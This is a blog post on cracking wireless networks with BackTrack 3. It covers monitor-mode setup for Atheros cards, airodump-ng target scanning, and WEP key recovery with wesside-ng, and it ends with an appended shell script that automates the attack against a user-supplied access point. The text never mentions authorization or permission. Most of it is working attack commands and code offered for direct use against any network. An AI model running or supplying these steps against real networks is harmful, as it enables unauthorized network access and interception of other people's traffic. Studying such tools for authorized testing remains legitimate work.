I've discovered 3 important things today.

First off - don't ever try to do pen (penetration) testing of wireless networks on a Windows machine. Just don't. The major problem (when you get past the fact there are about 3 wireless adaptors that actually work) is that all the best tools are firmly Linux based. So you're left with shoddy ports (and Cain & Abel, which is hardly speedy!).

The second thing I learnt is that VMware doesn't support PCMCIA cards on a laptop. DOESN'T. Mind you, I found this out after playing about with it for a couple of hours - believing that it would work... so at 3pm this afternoon I switched to a Linux LiveCD (BackTrack 3, as it happens).

Which was when I found out the third thing: BackTrack 3 works, out of the box, no setup, very little configuration. In under half an hour it was running, recognising the wireless card and attacking the network. 40 minutes later - voilà, network key found.

So really I learnt only one thing today: which was that BackTrack 3 is an amazingly neat and efficient tool, and I think we shall be seeing a lot more of it!

-----

Oh, also some advice: if you're using BackTrack 3 with an Atheros-based wifi card (which covers a large number of cards) and are struggling with all the tutorials on configuring the setup, IGNORE THEM. It does work and is very, very simple. The commands below use wlanconfig, which is the madwifi-ng driver's tool, so this applies to Atheros cards running that driver. Here is the best way to do things (using the KISS principle of destroy it all, then start from scratch):

Type: iwconfig

This lists all your wireless interfaces. For EVERY athN entry on that list (ath0, ath1 and so on, but not the physical wifi0 device, which is the parent the virtual interfaces hang off) type: wlanconfig <name e.g. ath0> destroy

Then type this command (ath0 and wifi0 may differ for you - use common sense): wlanconfig ath0 create wlandev wifi0 wlanmode monitor. Run iwconfig ath0 afterwards and check it reports Mode:Monitor before going any further.

Sorted.

Now you can fire up airodump-ng on ath0 (or whatever you called it) and scan for access points. Note down the BSSID (the MAC address) of the one you want to attack and the channel it sits on.

Lock the card to that channel (again substitute your name for ath0; note that airmon-ng takes the action first, then the interface, then the channel): airmon-ng start ath0 <channel>. If that complains, iwconfig ath0 channel <channel> does the same job.

And finally start up the AWESOME wesside-ng tool, which automates the whole WEP cracking process (it only works against WEP, not WPA; it may not be stable, so give it a few tries, and make sure you are locked to the channel with the command above or it will confuse itself :)).

Command: wesside-ng -i ath0 -v <BSSID of the target AP>

Hit enter and sit and wait. It could take minutes or hours, but it will usually get there.
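As an added example (this is not part of the original post; it is a hypothetical helper written for this page), here are the steps above collected into one POSIX shell script with the checks I would want before pointing it at hardware: it only destroys athN interfaces (never wifi0), refuses a bad channel before tearing anything down, refuses a malformed BSSID before calling wesside-ng, and has a dry-run mode so the plan can be inspected first. It assumes BackTrack 3 with the madwifi-ng driver (so wlanconfig exists), the aircrack-ng suite, and root; the function names, the DRY_RUN and PHY_DEV variables, and the iwconfig sample text are all my own constructions.

```shell
#!/bin/sh
# bt3-wep.sh: hypothetical helper (added example, not from the original post).
# Assumes BackTrack 3, madwifi-ng (wlanconfig), aircrack-ng suite, root.
# DRY_RUN=1 prints the commands instead of executing them, so the logic
# can be exercised without a wireless card in the machine.
set -u

DRY_RUN="${DRY_RUN:-0}"
PHY_DEV="${PHY_DEV:-wifi0}"   # madwifi physical device; override if yours differs

# Constructed iwconfig output showing two stale VAPs (sample data, not a real capture).
SAMPLE_IWCONFIG='lo        no wireless extensions.

wifi0     no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Managed  Channel:0  Access Point: Not-Associated

ath1      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Channel:0  Access Point: Not-Associated'

# run: execute a command, or echo it prefixed with "+ " when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        echo "+ $*"
    else
        "$@"
    fi
}

# list_ath_vaps: read iwconfig output on stdin, print the athN VAP names.
# wifi0 is the physical device and must not be destroyed; it is skipped
# because its name does not match (and it reports no wireless extensions).
list_ath_vaps() {
    awk '/^ath[0-9]+[ \t]/ && !/no wireless extensions/ { print $1 }'
}

# validate_bssid: accept only a 6-octet colon-separated MAC, the form
# airodump-ng prints in its BSSID column. Returns 1 otherwise.
validate_bssid() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# validate_channel: 2.4 GHz channels 1-14 only (the b/g range in use here).
validate_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# reset_monitor: destroy every athN VAP listed in $1 (iwconfig text, passed in
# so canned output can be used), create a fresh monitor VAP on $PHY_DEV and
# lock it to channel $2. Fails on a bad channel before anything is torn down.
reset_monitor() {
    iwconfig_text="$1"
    channel="$2"
    validate_channel "$channel" || { echo "bad channel: $channel" >&2; return 1; }
    for vap in $(printf '%s\n' "$iwconfig_text" | list_ath_vaps); do
        run wlanconfig "$vap" destroy
    done
    run wlanconfig ath0 create wlandev "$PHY_DEV" wlanmode monitor
    run iwconfig ath0 channel "$channel"
}

# attack_wep: refuse a malformed BSSID, then hand the interface to wesside-ng.
attack_wep() {
    bssid="$1"
    validate_bssid "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    run wesside-ng -i ath0 -v "$bssid"
}

# Usage:  ./bt3-wep.sh <channel> <target BSSID>        (as root, real run)
#         DRY_RUN=1 ./bt3-wep.sh 6 00:11:22:33:44:55   (print the plan only)
if [ "$#" -eq 2 ]; then
    live_iwconfig=$(iwconfig 2>/dev/null)
    reset_monitor "$live_iwconfig" "$1" && attack_wep "$2"
fi
```

Run it once with DRY_RUN=1 and the channel and BSSID you noted from airodump-ng; the printed plan should show one destroy per athN, one create on wifi0, the channel lock, and the wesside-ng call, in that order. Only then run it for real as root.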

Enjoy.